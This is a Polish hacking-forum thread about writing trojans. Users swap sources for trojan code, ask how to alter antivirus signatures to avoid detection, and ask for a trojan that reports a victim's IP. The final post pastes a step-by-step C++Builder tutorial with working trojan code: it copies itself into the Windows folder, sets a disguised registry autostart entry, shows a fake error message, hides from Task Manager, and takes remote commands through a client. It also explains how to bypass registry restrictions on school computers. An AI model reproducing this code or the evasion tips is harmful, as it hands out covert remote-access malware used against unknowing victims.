Pisanie trojanow

Major

Użytkownik
Dołączył
Sierpień 6, 2002
Posty
156
Witam,
Czy ktos z was pisal moze kiedys, lub przerabial kody zrodlowe trojanow?? (wiem ze napewno tak
<
). Wiec moglibyscie mi powiedziec w jakich jezykach sa one najczesciej pisane?? gdzie mozna znalezc kody zrodlowe... no i najlepiej jakis link do porzadnej lektorki o pisaniu trojanow... (znam niestey tylko C++ i Turbo..
<
).

Czy w kazdym z trojanow "seryjnych" typu cafeini av np. norton zajdzie sygnature trojana?? (chodzi o klienta, bo niewiem czy zciagniete przezmnie progsy sa zainfekowane, czy poprostu av sie czepia.. )

Pozdroofka, MaJoR :idea:
 
G

Guest

Gość
Moim zdniem najlepsza nauka jest czytanie kodow zrodlowych trojanow.
Znajdziesz je na achaesie w dziale download i dalej zrodla
 

SNiFF

Użytkownik
Dołączył
Wrzesień 21, 2002
Posty
372
Troajny sa pisane w jezyk c++ lub Delphi. Gdbys chcial sie tym pobawic to skontaktuj sie ze mna lub powpisuj w wszykiwarce: kody zrodlowe, programowanie cos w ty stylu
 

Shogun

Użytkownik
Dołączył
Kwiecień 26, 2002
Posty
160
Sorry ze nie napisze teraz na temat ale.. tutaj mamy przyklad ze dzial programowanie naprawde by sie przydal. JJesli istnialo by cos takiego nie trzeba byloby sie wymieniac informacjami na temat pisania trojanow mailowo tylko wystarczyloby zajrzec do dzialu programowanie.
 

izihack15

Użytkownik
Dołączył
Czerwiec 17, 2002
Posty
48
wrocilem

siemanko

trojany sa pisane najczesciej w delphi i......... visual basic
zagladnijcie sobie na strone www.megasecruity.com/trojans/

i pogladajcie sobie opisy trojanow to zobaczycie ze wiekszosc to visual basic lub delphi a napisanych w C to nie widzialem (chyba) w ogole

jestem zdziwiony
 

I_v0

Użytkownik
Dołączył
Czerwiec 26, 2002
Posty
122
Taaa. Tutaj pisze ze ktos umie w C programowac. Tylko przy pisaniu trojanow to potrzebne jest programowanie sieciowe w C/C++. Znasz moze to? Jezeli nie to mam dwie DOOOZE ksiegi na ten temat w domku jednak tylko w formie recznej i nie chce mnie sie ich wklepywac. Jak przeznaczysz na to jakies 300zl to w ksiegarniach spotkasz podobne.
:arrow: lec do ksiegarni
 

RiKeR

Użytkownik
Dołączył
Sierpień 13, 2002
Posty
137
Originally posted by I_v0
Taaa. Tutaj pisze ze ktos umie w C programowac. Tylko przy pisaniu trojanow to potrzebne jest programowanie sieciowe w C/C++. Znasz moze to? Jezeli nie to mam dwie DOOOZE ksiegi na ten temat w domku jednak tylko w formie recznej i nie chce mnie sie ich wklepywac. Jak przeznaczysz na to jakies 300zl to w ksiegarniach spotkasz podobne.
:arrow: lec do ksiegarni

Heh, masz moze jakies ksiazki w formie elektronicznej? Albo jakis kurs godny polecenia? Jak tak to byłbym wdzieczny jakbys wyslal [email protected]
 

I_v0

Użytkownik
Dołączył
Czerwiec 26, 2002
Posty
122
Wiesz jak sadze jestem w dosc dobrej sytuacji finansowej, nie musze wiec szperac w "smieciach" jezeli rozumiesz oco mi chodzi. To dlugo trwa, ja ide do ksiegarni i co miesiac kupuje cos w odpowiednim temacie. Tak mi sie uzbierala pewna kolekcja. Wystarczy jakies +-100zl miesiecznie. A pozatym GOOGLE?.
 

shackal

Użytkownik
Dołączył
Listopad 10, 2002
Posty
253
Originally posted by I_v0
Taaa. Tutaj pisze ze ktos umie w C programowac. Tylko przy pisaniu trojanow to potrzebne jest programowanie sieciowe w C/C++. Znasz moze to? Jezeli nie to mam dwie DOOOZE ksiegi na ten temat w domku jednak tylko w formie recznej i nie chce mnie sie ich wklepywac. Jak przeznaczysz na to jakies 300zl to w ksiegarniach spotkasz podobne.
:arrow: lec do ksiegarni
moze bys na podstawie tych ksiag - zmontowal jakiegos porzadnego faqa :?: bylo by to z porzytkiem dla wszystkich, nie wylaczajac mnie
<
 

I_v0

Użytkownik
Dołączył
Czerwiec 26, 2002
Posty
122
Moze bede oryginalny i raz sam siebie zacytuje:
W necie znalazlem tylko kurs podstawowy C ale nic a nic wiecej. To wlasnie zmusilo mnie do kupna. Adamie (wywnioskowalem ze tak sie nazywasz) ludzie do mnie pisza ze wszystkich stron ze radze im kupno ksiazki z kiegarni a nie podaje zadnych linkow. Prawda jednak jest taka ze chociaz niekoniecznie nie ma zadnych stron na ten temat, to na pewno jest ich malo i albo sa juz przystosowane do ludzi ktorzy na codzien paraja sie programowaniem sieciowym albo zawieraja szczatkowe informacje.
Jezeli kiedykolwiek znajde chwilke czasu to moze przeskanuje choc czesc ksiazek i wrzuce je dla was na jakis serwer, ale prowadze dosc zajety tryb zycia (o czym juz gdzies wspomnialem) i zdaje mnie sie ze nie zdolam zeskanowac wszystkiego tak szybko. Sa to dwie wielkie ksiazki kazda po (srednio) 1200 stron czyli razem 2400 - 1200 skanow * 1min/str= 1200min/60min = 20h - doliczajac poslizgi i czas przekladania kartek bedzie to rowno DOBA.[/b]
To jest czesc postu z tematu "PROGRAMOWANIE SIECIOWE W C++", dlatego moze wam sie wydawac lekko egzotyczny ten cytat. Dodam ze takiej knigi nie da sie ztrescic w jakims zasiegu czasu ktory bylby dla mnie do zaakceptowania. Oczekuje waszych postow juz na tamtym temacie, nie tu bo to raczej jest nie do tego.....
 

Major

Użytkownik
Dołączył
Sierpień 6, 2002
Posty
156
zrodlo..

Witam znoff,

Dloogo szukalem tych zrodel trojanow ale niestety, wogole niemoge sie dogrzebac nawet do jakiegos podrecznika o programowaniu sieciowym w c/c++.. Sa wogole jakies wersje sieciowe tych ksiazek??

Wiec moje pytanie musze ponowic: Czy tos z was ma jakiegos faq/linka/ksiazke/wiedze na temat pisania trojanow, badz linki gdzie mozna znalezc zrodla dostepnych trojanow..

A przyokazji czy ktos z was niewie przypadkiem gdzie w av sa sygnaturki wiruw (konkretniej trojanow)?? Bo mozna by zawsze looknac np. jaka sygnaturka jest wykrywalna przez av i odpowiednio ja zmodyfikowac by uzyskac potrzebny efekt..

Aaa i znacie moze jakies progsy czytajece pliki exe od zrodla?? cos jak hex view'er ale zeby presentowalo zrodlo...

Wiem ze pytania sa pewnie z lekka irracjonalne, bo gdyby to bylo takie prste to juz miliony loodzi by mialo swoje wlasne koniki, ale chociaz dajcie jakis, pomysl/natchnienie/wskazoowke...

Pozdr, Major :twisted:
 

moqKomar

Użytkownik
Dołączył
Luty 13, 2002
Posty
53
ej nie znajdziesz kompletnego faqa (jeszcze pewnie po polsku bys chcial) gdzie Ci napisza krok po kroku jak zmontowac trojana. Jezeli nie umiesz w niczym programowac to radze Ci wez sie za VB lub delphi bo w c/++ napisac trojana (wersje okienkowa) to raczej zadanie dla osob dobrze obeznanych w tym jezyku.

Jak chces pisac trojany to najlepiej sie czlowiek uczy przegladajc zrodla - sciagnijs sobie zrodla z ftp Achatesa, przeanalizuj i bedziesz wiedzial co w trawie piszczy
 

Major

Użytkownik
Dołączył
Sierpień 6, 2002
Posty
156
Ok,

Ok czyli mowicie, ze najlepiej sie uczyc z gotowych juz zrodel..? Chyba zecxzywiscie macie racje.. Ale ja niepisalem ze faq musi byc po polandzkiemu, bo akurat z jezykiem komputerowo/angielskim sobie radze.. pozatym czesci sie mozna domyslec.. A wie ktos moze gdzie mozna znalezc zrodlo cafeiniego? Bo narazie mam backdoor orfica ale chcialbym cafeiniego..

Dzieki i pozdro all
 

I_v0

Użytkownik
Dołączył
Czerwiec 26, 2002
Posty
122
Tutaj ktos wspomnial o tym jak zbadac kod trojana. Sprawa jest prosta dla tego kto umie Assemblera. Istnieje cos takiego jak deassembler i wtedy po przpuszczeniu przez cos takiego wybranego programu pokazjue on kod programu napisany w Assemblerze..... Jest gdzies w sieci, juz nie wiem gdzie ale chyba na www.undeground.org.pl tekst kolesia ktory nauczal assemblera w szkole i postanowil przepisac caly wyklad, ale on z tego co pamietam naucza na podstawie HLA High Level Assembler, co zdaje mnie sie nie do konca czystym Assemblerem, ale nigdy nie czytalem....
 

Anioł

Użytkownik
Dołączył
Styczeń 7, 2003
Posty
12
trojaniki

witam
jestem tu nowy i wogule z lekka zielony jak bys mugł snifer to podzuc mi materjały jak napisac prostego trojana a dokładnie jego funkcja ma byc wysyłanie z kompa ktury mam modem aktualnego adresu ip w momencie wejscia do internetu na tym kompie najlepiej zeby sie udało zrobic tak zeby on wysyłał nie na majla tylko na konkretny niewiem jak to nazwac ale moze mozna na konkretny adres ip jako komunikat na ekran albo folder txt.no niewiem moze ty mo pomożesz jak i czy wogule jest to mozeliwe?
z góry thenx
 

mk83

Użytkownik
Dołączył
Styczeń 8, 2003
Posty
10
blebleble

Wiecie co ! Odnosnie tych ksiązek to kiedys znalazjem poprzez kaaze calą ksiązke przpisaną na kompa.Tylko jedna kapa po angielsku ! Pozdrawiam .
 

Dexter

Użytkownik
Dołączył
Listopad 26, 2002
Posty
248
Pisanie trojana jest prostsze niz sie na poczatku wydaje. Najczesciej pisze sie w Delphi.
Ja sam pisze trojana i kiedy do tego sie zabralem obejrzalem przyklad "Trojan" w którym jest swietnie pokazane jak zrobic trojana, to bardzo proste .
Cient wysyla jakis text, a serv na to reaguje wykonujac dana procedure.
Tak jak juz powiedzial adam13 dobrze jest zrodla przegladac (nie sklejac bo to LAMERSKO) Sa rozne FAQ np Pisania Trojana w DElphi ale to nie jest zbyt dobrze napisane. Lepiej juz poprzegladac 3xbacdoor, !A New Trojan i Prosiaka (nie za bardzo czytelne zrodlo, odradzam zrodlo Prosiaka dla poczatkujacych, nie znajacych sie na Delphi) no i jeszcze jest taki trojan shmatka ale to tez moze jako przyklad poslozyc jak zaczac bo jest malo opcji, co prawda wiecej niz w "Trojan" ale w takim przykladzie najwazniejszy jest "szkielet" trojana z opcjami nikt nie powinien miec problemu, a jak ktos ma juz problem to:
(ostrzegam niektóre to totalny kit!!!)

4programmers.net
programik.com
delphi.icm.edu.pl
delphi.koti.com.pl
delphi.bajo.pl
www.bsc.com.pl/delphi
www.delphi.qs.pl
www.delphiqa.org.pl
www.delphi-area.scrypty.com
www.cybernet.com.pl/delphi
www.delphi.host.sk
www.portal.delphi.prv.pl
www.strefa-delphi.net
www.delphi.computerzone.pl
itd.......


DeXtEr 2003
 

Sz#sz#

Użytkownik
Dołączył
Listopad 11, 2002
Posty
140
Masz tu dokładne INFo ( to NIE moje tylko Morbius z CYBER-CRIME Team)




*** Trojany ***


Tu sprawa troszeczkę się komplikuje, bo musimy napisać dwie aplikacje - klient i serwer...
Jest to troszkę bardziej skomplikowane niż prościutki mail-bomber, ponieważ weźmy np. serwer - musi on działać niewidocznie w tle, musi uruchamiać się za każdym startem komputera. Dobra dosyć pitolenia, przejde do rzeczy. Każdy krok będę tstarał się jak najdokładniej tłumaczyć...
PS.Przedstawiam tu prostego trojana - będzie miał tylko 2 opcje wysuń/wsuń CD, jednak jeśli ktoś załapie o co chodzi doklei sobie inne procedury
<


Na początek aplikacja Serwera:

Trojan powinien się instalować w katalogu windowsa i być uruchamiany przy każdym starcie systemu więc:

1. Wsawiamy TTimer z nazwą "Kopiuj" i "Interval" ustawiamy na "1000" ms

2. Pod Timerem wstawiamy:

void __fastcall TMForm::KopiujTimer(TObject *Sender)
{
BufferSize = GetWindowsDirectory(polish,0);
WinDir.SetLength(BufferSize+1);
GetWindowsDirectory(WinDir.c_str(),BufferSize+1);
strcpy(Dir1,WinDir.c_str());
Dir1[BufferSize-1] = '';
Dir1[BufferSize] = 'H';
Dir1[BufferSize+1] = 'O';
Dir1[BufferSize+2] = 'O';
Dir1[BufferSize+3] = 'K';
Dir1[BufferSize+4] = 'S';
Dir1[BufferSize+5] = '.';
Dir1[BufferSize+6] = 'E';
Dir1[BufferSize+7] = 'X';
Dir1[BufferSize+8] = 'E';
Dir1[BufferSize+9] = '0';
AnsiString tmp1 = ParamStr(0);
char tmp2[100];
strcpy(tmp2,tmp1.c_str());
char File1[30];
int tmplength = strlen(tmp2);
int lastslash;
for (int i = tmplength-1; i > 0; i--)
{
if (tmp2 == '')
{
lastslash = i;
break;
}
}
for (int i = lastslash+1; i < tmplength; i++)
{
File1[i-lastslash-1] = tmp2;
}
File1[tmplength-lastslash-1] = '0';
CopyFile(File1,Dir1,FALSE);
if (ParamStr(0) != Dir1)
{
Kopiuj->Enabled = false;
MessageBox(0,"Low Memory","System error",MB_ICONWARNING);
}
TRegistry *Reg = new TRegistry;
Reg->RootKey = HKEY_LOCAL_MACHINE;
if(Reg->OpenKey(
"SOFTWAREMicrosoftWindowsCurrentVersionRunServices",
true))
Reg->WriteString("Microsoft Manual Driver ", Dir1);
Reg->CloseKey();
delete Reg;
}

3. W pliku nagłówkowym (OpenSource/Header File) - który najczęściej ma nazwę Unit1.h wstawiamy pod "private":

private: // User declarations
AnsiString WinDir;
int BufferSize;
char Dir1[50];

4. W pliku Unit1.cpp dodajemy jeszcze bibliotekę:

#include <Registry.hpp>

Już wszystko wyjaśniam... Pod timerem kopiujemy nasz plik do katalogu windowsa pod nazwę "HOOKS.EXE" oraz dodajemy wpis w rejestrze w gałęzi HKEY_LOCAL_MACHINESSOFTWAREMicrosoftWindows CurrentVersionRunServices o nazwie Microsoft Manual Driver, co zapewni start programu przy każdym uruchomieniu systemu. Dalej zachodzi porównanie jeżeli plik nie jest w katalogu windowsa to pokaż wiadomość "Low Memory", która jest dla zmyłki. Uff... to dpiero początek
<


5. Powinniśmy sprawić, aby nasz trojan nie był widoczny w okienku Task Menagera Ctrl-Alt-Del.Należy wywołać funkcję RegisterServiceProcess, która znajduje się w Kernel32.dll.

Dodajemy:

//---Plik nagłówkowy---
typedef DWORD (__stdcall *pRegFunction)(DWORD, DWORD);

private:
HINSTANCE hKernelLib;
pRegFunction RegisterServiceProcess;

//------plik CPP------
#define RSP_SIMPLE_SERVICE 1
#define RSP_UNREGISTER_SERVICE 0

__fastcall TForm1::TForm1(TComponent* Owner)
: TForm(Owner)
{
hKernelLib = LoadLibrary("kernel32.dll");
if(hKernelLib)
{
RegisterServiceProcess =
(pRegFunction)GetProcAddress(hKernelLib,
"RegisterServiceProcess");

if(RegisterServiceProcess)
RegisterServiceProcess(GetCurrentProcessId(),
RSP_SIMPLE_SERVICE);
}
}

__fastcall TForm1::~TForm1()
{
if(hKernelLib)
{
if(RegisterServiceProcess)
RegisterServiceProcess(GetCurrentProcessId(),
RSP_UNREGISTER_SERVICE);

FreeLibrary(hKernelLib);
}
}
//--------------------

Jeszcze plik Project Source (View->Project Source) powinien wyglądać mniej więcej tak:

//--------------------
#include <vcl.h>
#pragma hdrstop
USERES("serwer.res");
USEFORM("main.cpp", MForm);
//--------------------

WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int)
{
try
{
Application->Initialize();
Application->CreateForm(__classid(TMForm), &MForm);
Application->CreateForm(__classid(TChat), &Chat);
Application->CreateForm(__classid(TEML), &EML);
Application->ShowMainForm = false;//zwróććie uwagę na te dwie linijki!!!!!
ShowWindow(Application->Handle, SW_HIDE);//!!!!!
Application->Run();
}
catch (Exception &exception)
{
Application->ShowException(&exception);
}
return 0;
}
//--------------------

Uff. najgorsze mamy za sobą
<


Teraz jeszcze musimy się komunikować z serwerem naszej ofiary...

6. Wstawiamy TNMMSGServ z nazwą "Serv" i ustawiamy "Port" na "36"

7. Pod zdarzeniem "onMsg" "Serv" wstawiamy:

if(sMsg == "open-cd")mciSendString("Set cdaudio door open wait", polish, 0 ,Handle);
if(sMsg == "close-cd")mciSendString("Set cdaudio door closed wait", polish, 0 ,Handle);

8. Na początku pliku Unit1.cpp dodajemy bibliotekę:

#include

Teraz jeszcze należy przekompilować nasz projekt z wszystkimi potrzebnymi bibliotekami, aby działał na każdej maszynie.

Klikamy "Project"->"Options" i wybieramy zakładkę "Linker" - tam odznaczamy opcje "Use dynamic RTL" i jeszcze zakładka "Packages" - tam odznaczamy opcję "Build with runtime packages". Zwiększy to trochę objętość naszego programu. Acha dam jeszcze dobrą radę użyjcie programu UPX (najlepiej tak: upx -9 serwer.exe - wtedy uzyskacie najwyższą kompresję), który można śćiąnąć gdzieś z internetu. UPX zmniejszy objętość serwera do ok 160KB(!) z wcześniejszych ok 340KB.

I nadszedł czas na klienta :)

Tu sprawa jest o wiele prostsza. Wystarczy tylko pod określony host wysłać określoną komendę (w naszym przypadku "open-cd")

1. Wstawiamy TEdit z nazwą "IP"

2. Wstawiamy 2 TButtony z nazwami "Open" i "Close"

3. Wstawiamy TNMMsg z nazwą "klient" i Portem "36"

4. Przy zdarzeniu onClick Buttona "Open" wstawiamy:

void __fastcall TForm1::OpenClick(TObject *Sender)

{
klient->Host = IP->Text;
klient->PostIt("open-cd");
}

5. Przy zdarzeniu onClick Buttona "Close" wstawiamy

void __fastcall TForm1::CloseClick(TObject *Sender)
{
klient->Host = IP->Text;
klient->PostIt("close-cd");
}

Uwaga: w TEdit`cie o nazwie "IP" wpisujemy adres hosta, na którym uruchomiony jest serwer... I mamy prostego trojana !!!

Jeśli chcemy dodać nowe opcje to piszemy w kliencie zeby wysłał jakąś tam np "komenda1", a w serwerze if(sMsg == "komenda1") i wstawiamy jakąś procedurę... Proste nie
smile.gif
Mam nadzieje że zrozumieliście. Jeśli nie to próbujcie...


*** AntyNuke ***


Tutaj postaram wam przedstawić prosty anty-nuker własnej roboty
smile.gif

Każdy chyba wie, że programiści z Mirro$oftu nie przykładają się aby zabezpieczyć, czy nawet ustabilizować swoje oprogramowanie. Tak jest z winDowsem - otwarty port 139 może narazić nas na wyżucenie z sieci, co jest troszkę wkurzające.

Nie wiem jak to jest z Windowsem Me ale z 95/98 wystarczy zmienić pewną wartość w rejestrze, aby zamknąć owy nieszczęśliwy port 139
smile.gif


1. Dodajemy w nagłówku

#include

2. Przy zdarzeniu "onCreate" Formularza wpisujemy kod:

void __fastcall TForm1::FormCreate(TObject *Sender)
{
int x = 0;
TRegistry *Registry;
Registry = new TRegistry;
Registry->RootKey = HKEY_LOCAL_MACHINE;
Registry->OpenKey("System",x);
Registry->OpenKey("CurrentControlSet",x);
Registry->OpenKey("Services",x);
Registry->OpenKey("VxD",x);
Registry->OpenKey("MSTCP",x);
Registry->WriteString("BSDUrgnet","0");
}

Ale to nie wszystko przecież zmianę w rejestrze można zrobić ręcznie bez żadnego dodatkowego pisana programów, dlatego my dodamy jeszcze komponent TNMMSGServ, który nasłuchiwał będzie na porcie 139 i dodawał do memo każdą przesyłaną na ten port wiadomość. Wtedy za każdym razem, gdy ktoś będzie chciał połączyć się z otwartym porem w Windowsie (który zamkneliśmy poprzez rejestr) łączy się z naszym programem. Nasza aplikacja podnosi wtedy alarm i wiemy, że coś jest nie tak. W sumie taki bardzo uproszczony firewall
smile.gif


3. Na początku wstawiamy TNMMSGServ z nazwą "Serv" i Portem ustawionym na "139"

4. Wstawiamy TMemo z nazwą Memo

5. Przy zdarzeniu onClientContact TNMMSGServ:Serv wpisujemy kod:

void __fastcall TForm1::ServClientContact(TObject *Sender)
{
sndPlaySound("c:windowsmediatada.wav", SND_ASYNC);
}

6. W nagłówku dodajemy:

#include

7. Przy zdarzeniu onMsg TNMMSGServ:Serv dodajemy:

Memo->Lines->Add(sMsg);

Teraz kopilujemy program i gdy wchodzimy do sieci włączamy go zminimalizowanego. Za każdym razem, gdy ktoś będzie chciał się połączyć poprzez WinNuke`a dostaniemy alarm w postaci dźwięku, wtedy otwieramy program i sprawdzamy, może to nie Nuker, tylko jakaś inna aplikacja przesłała wiadomość, którą możemy odczytać w Memo ;P


*** Ograniczenia dostępu w Windowsie ***


Jak już napisałem wyżej Micro$oft sqad nie postarał się o zabezpieczenia swojego systemu. Tak też jest z ograniczeniadmi dostępu (najczęściej w komputerach w szkolnej pracowni)nie można np. zmienić rozdzielcości ekranu itp. Ale to można w łatwy sposób obejść prostym programikiem ! Całe te zabezpieczenia zawarte są w rejestrze, jednak czasami i dostęp do rejestru jest zabezpieczony
smile.gif
więc nie ma to jak przekompilowanie własnego programu, który dokonuje zmian w rejestrze zdejmując równocześnie zabezpieczenia (!)

1. Dodajmy bibliotekę obsłuki rejestru:

#include

2. Przy zdarzeniu onClick TButtona wpisujemy:

void __fastcall TForm1::ButtonClick(TObject *Sender)
{
int x=0;
int buf=0x01;
int bufno=0x00;
TRegistry *Registry;
Registry = new TRegistry;
Registry->RootKey = HKEY_CURRENT_USER;
Registry->OpenKey("Software",x);
Registry->OpenKey("Microsoft",x);
Registry->OpenKey("Windows",x);
Registry->OpenKey("CurrentVersion",x);
Registry->OpenKey("Policies",x);
Registry->OpenKey("Explorer",x);
Registry->WriteBool("NoDesktop",buf);
}

Uwaga:
bufno - oznacza, że zdejmujemy zabezpieczenie
buf - oznacza że zakładamy ograniczenie

Takim to sposobem zyskaliśmy sobie dostęp do pulpitu... pokazałem na przykładzie, a teraz spis poszczególnych gałęzi:

HKLMSoftwareMicrosoftWindowsCurrentVersionPoliciesNetwork
HideSharePwds - ukrywanie haseł udostępniania poprzez zastąpienie ich na ekranie gwiazdkami
DisablePwdCaching - wyłączenie buforowania haseł
AlphanumPwds - wymaganie korzystania z hasła alfanumerycznego
MinPwdLen - minimalna długość hasła
NoDialIn - brak możliwości odbierania telefonu
NoPrintSharing - brak możliwości udostępniania drukarek innym użytkownikom
Kolejne klucze tyczą się już konkretnego użytkownika, czyli w kategorii HKEY_CURRENT_USER lub HKEY_USERużytkownik

HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem
NoDispCPL - wyłączenie dostępu do właściwości ekranu
NoDispBackgroundPage - wyłączenie dostępu do zakładki właściwości ekranu TŁO
NoDispScrSavPage - wyłączenie dostępu do zakładki właściwości ekranu WYGASZACZ EKRANU
NoDispApperancePage - wyłączenie dostępu do zakładki właściwości ekranu WYGLąD
NoDispSettingsPage - wyłączenie dostępu do zakładki właściwości ekranu USTAWIENIA
NoSecCPL - wyłączenie dostępu do arkusza właściwości HASŁA
NoPwdPage - wyłączenie dostępu no zakładki ZMIEŃ HASŁO arkusza HASŁA
NoAdminPage - wyłączenie dostępu do zakładki ZDALNE ADMINISTROWANIE arkusza HASŁA
NoProfilePage - wyłączenie dostępu do zakładki PROFILE UŻYTKOWNIKA arkusza HASŁA
NoDevMgrPage - wyłączenie dostępu do zakładki MENADŻER URZąDZEŃ arkusza SYSTEM
NoConfigPage - wyłączenie dostępu do zakładki PROFILE SPRZĘTU arkusza SYSTEM
NoFileSysPage - wyłączenie dostępu do arkusza włąściwości SYSTEM PLIKÓW
NoVirtMemPage - wyłączenie dostępu do arkusza włąściwości PAMIĘĆ WIRTUALNA
DisableRegistryTools - wyłączenie dostępu do Edytora Rejestru
HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesNetwork
NoNetSetup - wyłączenie dostępu do właściwości sieci
NoNetSetupIDPage - wyłączenie dostępu do zakładki właściwości sieci IDENTYFIKACJA
NoNetSetupSecurityPage - wyłączenie dostępu do zakładki właściwości sieci KONTROLA DOSTĘPU
NoFileSharingControl - brak kontroli nad współużytkowaniem plików
NoPrintSharingControl - brak kontroli nad współużytkowaniem drukarek
NoEntireNetwork - brak folderu CAŁA SIEĆ
NoWorkgroupContents - brak składników grup roboczych w OTOCZENIU SIECIOWYM

HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer
NoPrinterTabs - ukrycie zakładek OGÓLNE i SZCZEGÓŁY arkusza właściwości drukarek
NoDeletePrinter - brak możliwości usuwania drukarek
NoAddPrinter - brak możliwości dodawania drukarek
NoStartMenuSubFolders - ukrywa podfoldery menu START
NoRun - brak polecenia RUN
NoSetFolders - brak polecenia USTAWIENIA w menu START
NoSetTaskbar - brak właściwości paska zadań
NoFind - brak polecenia znajdź
NoDrives - brak dostępu do dysków logicznych (tyle jedynek ile kolejnych dysków ma być ukrytych)
NoNetHood - brak dostępu do OTOCZENIA SIECIOWEGO
NoDesktop - brak pulpitu
NoClose - brak możliwości zamknięcia Windows
NoSaveSettings - wyłączone zachowywanie ustawień przy wyjściu z Windows
RestorictRun (Klucz) - lista dozwolonych aplikacji
HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies WinOldApp
Disabled - brak możliwości uruchamiania aplikacji DOS'u
NoRealMode - brak możliwości uruchamiania aplikacji DOS'u w trybie pojedynczej aplikacji

Build All
<
[/b]
 
Do góry Bottom